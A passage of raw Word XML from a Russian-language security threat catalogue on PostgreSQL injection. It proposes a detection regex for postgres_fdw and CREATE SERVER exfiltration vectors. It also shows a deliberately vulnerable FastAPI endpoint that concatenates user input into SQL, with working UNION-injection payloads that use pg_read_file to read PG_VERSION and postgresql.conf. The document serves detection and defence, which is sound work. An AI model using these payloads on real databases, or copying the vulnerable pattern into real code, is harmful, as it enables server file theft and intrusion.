          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CE09E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — privilege escalation: пути получения USAGE ON FDW для non-superuser (наследование от admin-роли, цепочки через SECURITY DEFINER).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91CAFF"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postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER MAPPING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> расширить класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (предложенный в 3.6.1) regex-ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(CREATE\s+SERVER|CREATE\s+USER\s+MAPPING|CREATE\s+FOREIGN\s+TABLE|postgres_fdw)\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — добавить как вторую ветку в ту же regex-проверку, что и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_*</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы получить единый detector по всем OOB-векторам категории 3.6. Базовый риск 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A254897" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EAC49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420447C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: CREATE SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942A6A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: CREATE FOREIGN TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF9308" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: CREATE USER MAPPING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B86F41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: DO — Execute anonymous code block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5590BFD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: PL/pgSQL EXECUTE с format()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B9F66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ibreak.software: «Using SQL injection to perform SSRF/XSPA attacks»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BEEA2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — postgres_fdw / SSRF section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122A2C7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>AWS: Use IMDSv2 (метаданные с header-protection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9B270" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger SQLi cheat sheet — PostgreSQL section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F7CA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RFC 1035, §2.3.1: Preferred name syntax — label charset &amp; length limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D15C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.6.3 pg_read_file и pg_read_server_files — file-read из SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58BB8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> читают файлы напрямую через ОС-API под uid backend-процесса PostgreSQL. Результат возвращается прямо из функции — </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>отдельного канала эксфильтрации не нужно, достаточно классической UNION-инъекции в любой SELECT-эндпоинт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1FBE4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED48504" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/products.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF934B"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2CC25780" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A38645"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3A62C475" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17899A"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7406D5A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E3E8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF2A8EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B474FB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8C06C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458AAC87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_products(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740980D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    category: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0DB73"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550FA3B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408949F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683A7C3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, name, price FROM products WHERE category = '{category}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD2041" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B2D43"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36544067"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593779D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>category</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, три колонки в SELECT (int, text, numeric). Для UNION-инъекции атакующему достаточно подобрать совместимые типы — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что идеально подходит в колонку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049554A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — PG_VERSION (относительный путь, без специальных прав)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5859D637" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Минимальный payload, работающий с привилегиями обычной application-роли. Путь без ведущего </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируется относительно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL-кластера. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — однострочный файл с major-версией кластера, всегда присутствует в data_dir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BF01F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `category`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B79D91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, pg_read_file('PG_VERSION'), 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924A862" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C6FDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, name, price FROM products WHERE category = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3CA7AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, pg_read_file('PG_VERSION'), 0 --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F8DC95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает строку вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"16\n"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — мажорная версия PG. По ней — карта применимых CVE из раздела 4 и понимание, какие следующие payload-ы доступны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632FFF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — postgresql.conf через offset/length (chunked)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D929DA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Большие файлы читаются кусками через трёхаргументную сигнатуру </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file(path, offset, length)</w:t>
      </w:r>
      <w:r>
        <w:t>. Полезно когда: (а) HTTP-response имеет лимит на размер; (б) WAF блокирует крупные UNION-ответы; (в) нужно итеративно перебрать содержимое не нагружая один ответ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB68C00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `category`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225934C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, pg_read_file('/etc/postgresql/16/main/postgresql.conf', 0, 50000), 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690A666" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
